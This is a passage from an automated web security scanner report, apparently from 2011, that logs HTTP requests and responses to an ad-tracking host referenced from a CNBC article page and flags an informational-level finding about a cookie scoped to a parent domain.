GET /I10985/b3/0/3/1008211/791107298.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_kr1J="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEldrjeS5HxvCqNxuS+n50ciflLT+1J0P6gLbMGDDDadDEwiYGhrUmSSdtbgu/Eq4vgS+6T3IX2BCKmDeo/VxHIw15Fs+jlaTDcPTc2IYGL18w5BwDWovbxjBin2seD/phdspV8uv8Z4Mkoc+lkv9WbD3FYqLNGgYepUSbJBMAs4ntfJnW6zKY1gna4xYDoaib5NFQsUbKRQbkSTwCofF8K8KN254COjeMuVcIzQIgUFBn3hn4q78m0uQxpq/2fR6D7w3NjSFHX7CLeaQ2j0eiPBr+F2ha1t/eZY0iS2FVtFkPY6yUG/Mdp+9CUaKO8Udp1GIPAVGeOzI/gLkcKTOgHoEtGudWxS6NKxqNsmL7IbGf+ubFq1Kbspi94yn281eifDOK6UVxhzWl/FKX7yEnw49R1Jm4bM2rhLGxekUijV5ouvEAFjr5j5m6ytliGwSX+YaIzUmm6Q0p40pkSUq/GHJ5UgAGc4oAz0LLF2GbbdRjTvlsOlPdGz/RajDPSwxQdyLWjQmlfQ3KByMJd7E/Ii1PLLUY9zCc86OMn+xo/ahaWCuNreBwpL0NfQcAmlXRKPq0B0GxU2x5TSIzrk8FNKJkulDQTMBT/DlQMz6nvcu3ePGAN8j5VjQNO0tM9MgtLyQ8b3HO0bpkd8OWoHG50nHdxFEg5ktTaKKLsRU9/gSjQIo1kVXI8hC2i17O8xk62FbTLMq3mo6r4Yh0PxbrzgU2NkoBjvItejXRSm8XxFYxhE/K4PhyVlEaaBfOTxZfBRvMK2xyD/+9zX7qiVu/eALAQ1gIE87fpDQv24xK3yiqFMw1MRdx4Llb40K01AqyWXX5FH/eYVf9+pfAueCUA0BP8Q1ehFu1K9GXEyCi/xoSGf7STCUKJgSJ827v6DnMgQ/aoo1DD7CZHcjdVy7U/YjYKRSoTtRtogc9zQumFScDJkLMRuVsEfIv2oARwpY6/mF57+ozCKBuTGgzal/5toVj2DkeWKAACXa4tas5Rkk+/QT5odgm4fjTK8qhuY6ZPtRJfavw4tWROZODdyfA0VN8Wm72pnq+2sKoqh8KFWGZhaETDrflDfeI59PTs99wC1wMFqzYq2pxp0P7n4icz+uVsNUY/1qH8JowSR8GN+bgwtp6clZcbnW/w0Gj5poLBJU1KIAZxiTNjmzqHxn4WTq27WGTNTzFb+pI2TPRL5RQ8vq/mpGpj8Y7jnQ2Gi3oS+puN+pHyjJaFvsZfXSNj3f20WXBKOIzVpmZism01RarzJ/SLNkwdY7hUZuYE1k8/V9PjVOfORXl90RUI2ALyvR+QYMQB"; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/x9aZAzFnepwZbEAIrfBzwu6EE8765sab61E9ixdhkO0/oeWEARl89VyzeXb2LSCh7tNNw/K+UeEZ3V5adSMR3EMTlfe6QLKcnsnHxyliujGuJqXIX7++xkUy4o966zaT9dM2phazJHJEovChT61iQApBsxEALUQ7jEeKRDqdYYJtCMauKIrsggvvActx3FitAStDg/iZgtACecfpioZOjcLifes0CGlrb517QrQT84S6IK07fKvfHYa1Nfm6WuhTzQ73symab5t1Xb4eMTtfLK1kM7jouazlFjZ0Ev5vsukEMicI+4X6y4m/3cMVgAW32xLKYYwbY/E9JsozWTjLC+eFFCB/3T0WN6/s1KgvwFnqXctRIQ/Or/hsIUTYCDXEIkV7aaPiOviEbg2edMO4tQkV2DTjZ7d5cVNa6cGeEYqBGKLbQvV8CJ3jVt9fsvMGev2f0aV6mMlgpJz381KseB2XMKVVKKs5GrkU/htK5TyOPz372ZEUQqSGN0Nf93KOSKKLPAH0Nsd7DSPEJt+QgHym6oNnZSLuUbP/zzgS11NGf5CNFAwwF+apDAeLJdFhdnGoXOIGr7PBz2h3/F3gREzSsD0yP5A0zMugWZq5Vph1T4CmI/zt1GFqjUqkLg7CZlPXy48GZALMjYG/SzbMc416TCyBOi/GcdBny5UfdmjPTenMQNUq52CHvBbygsH8RyMoi+tBWhL0l50TXbUmHN+Q6QbrGRCNjfFhoRrBQ+T2mMdnviH6smDwdaeygk2OtYXfloDM11JdokkA1WW/II7wJmAazBsPtOJsRHWYh1HagVzaKvPhUjjVwnZNAwur5XH+vKFrImHjdO/4e6pGf4pUXCZ3OOtwF62oK8v3lSnmIKCG9mUetUeVybSTofOEHZkEc9QYhYIeOvAMNdzQg3rb7ZV6UXcDt0DJjqhaVnCfMkbT0N/gnzu97RO9bXy5iaDW5GYzTMCamIDVSEsah8HHHmxxaI66WKVOLvVljwLPRhXhF8bSUsMABe6UpKkRBln8YPRC9E+cDNm619Yx52nWuyaRqTTawYACSVW6G6gb7jBSj9Nzji6sgFJz4INGgBfOTLwmiKp4rI3QZiuCU7/ENI60dGB9cLMbgnGjd6/7YlxTuyQZseW7cSg/fDMJyZbT8u/rgEEgcp3yWN3A8NRdPokfM8E7541fnx90L5Bx/mJCRXuLukYWnd6CzPRe2tFD8dvJ0WGMCjNCVOaNAiu/Qvv6Lv9uwHzb1lamJ5jk5Uzpo9RFgh2aJ2OpH6lm/TsWioD1Ug745NLDQ+h83lce1XqNT3lTbb3PEOOxZ4FujYx5HjYcIvl1lxP5JVPKnN/JnqRHU7/xQMSEgtGCm+CVUy934eefNPAZydw5NxSXD33zctEoDps0SlJZTAmCy+Yl3ZrBcfvyIuWWBw5c09txjbo+zpeHeXob6DO0lEP75W2fyeORCjm3z0Gz8Rso8RRcQXX+T0s1KAR+yz13n8O2T8/848xHA14DoiHX8fEof/XR2z3h0gQn/QHs8uDD73e14In4r4T2dRICSNYRw1QI2E14Db+lUe0X5EArhOdvh3vJyjQ77HzwOW5TklVG65RQ1eu3hZOlKMl5+C+xgSGR4SiSGyFyyBSjkIZiPdd8XfQoXZtqaPm6LgDUh6itIgjMafsHs57znC1ZjrPtK02xG1J+YzG/rU06izeAKFmudTpiUmuNMBORSipNbBblTmmWBqMJ1mOO1aejmyHqk2qjD6w=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT7qjRECODDnaNjDw+Y00QAVcAmzxwHjFD/A8MFcKuHNnC5IPxltWubUP+e1DI5JI6cxeuYoCNNM=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjkGXQ0oLjsSKY/4HossPOTKQJnIcaZP0OG+K1TVdceBnAk0K+jW+8zO6PZVdN909hLW6U3SszoJ4UGSJUJwBNvCgtlitVpEHxH/U/nxw+K0euFsiQbwAZpCdMOuAuxLFtJvZhlg+uZFSUKB2jielQgHXzANC4gHpVkBOGa3eWiyV0SqZNVe0D3NUVKDinJAOYGfBZEDB+M9DRdyJq9bt5XnNME=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:22:15 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:22:15 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.194. http://pix04.revsci.net/I10985/b3/0/3/1008211/811937771.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/811937771.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMKLT2uikdn5vw/ZUsicc4VPat72X0BRE3fmuDUz/xw+ppzybIZwS4Eca2TOPNNPf1VWx+g6q/yqUz7hReIUafnkll3Rq9qruA1HphVsEataiCU4UsktlzVfsKfbGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdrai8EDZe5QGsJaR2lbzBppIqOW4sghTvfDbBz9w6xOnT6rKWeoL4o7hjL6yZJnvXVE/sak4VW1ruM/+CyXwJk4Hw4YSr369H0jhzHFve3eZhMuANMVlHLPP5gs5zBNa0q4sbKxPSlJ+Dr9tNi3/kNAewybd7S4DSWipP44CIAMVSFYHAD053+0LFGYD6cdJHq+Xxmn8pVBku2H5LxEeONgXe2Rb0eURb/DUc8APYKUwl8auJCEmLIdLrK3FGlmLgXyl5F5sYnIsytuxFsAUBEpmQ232iRqQn4VheUU+7XmFCi7gwUI1/JSNLf3zVlP93r+tmLtsYrZSu4olovzFDWLZalCAK9m0inSch7wHrKI2jDUlKH251qJet39UNQmd+V5pabMBUMBnSgPn8qcRoMKbm4MH0u9ddDZ35h8C7g7+ztf1TvTm7N6yq2hVkZ7u74bje6nfDdoHA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:05:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/811937771.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; 